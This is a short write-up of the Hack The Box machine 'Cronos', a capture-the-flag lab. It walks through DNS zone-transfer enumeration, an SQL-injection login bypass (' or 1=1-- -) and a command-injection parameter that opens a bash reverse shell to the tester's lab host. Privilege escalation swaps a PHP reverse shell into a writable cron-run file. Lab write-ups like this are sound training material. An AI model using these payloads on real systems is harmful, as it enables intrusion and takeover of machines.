HTB - Cronos
In Cronos we get exposed to some new and some old! Some DNS enumeration followed by SQLi with a bit of OS command execution will get us on the box. Privesc we abuse a particular cronjob.
First, our can:

22,53,80!
DNS enumeration:
First step is to resolve the IPs of Cronos, use nslookup

Any time we see DNS running on TCP, we should try for a zone transer:

Perfect! Lets add these names to our /etc/hosts
file:

Next step visiting cronos.htb

Nothing much going on here so I’ll pivot over to admin.cronos.htb

After many trivial and useless attempts to crack this, I finally found a SQLi that worked:
' or 1=1-- -
Absolutely brutal but a reminder to run through the gambit before you call it quits!

Now depending on what is happening here I think we can issue some OS commands by chaining commands and if we can, reverse shell!
Even easier than that I realized I could intercept the request and place my own command!
command=bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.9/443+0>%261'%26&host=8.8.8.8
and we got a shell!

Grab the user flag and your PrivEsc tool, I used LinEnum.sh here.
It leads us to a cron job and I notice I have write permissions to the file that’s being run.

I went into my php reverse shell toolkit and grabbed my reverse shell. Copied it onto artisan and waited:

Grab the flag and all set!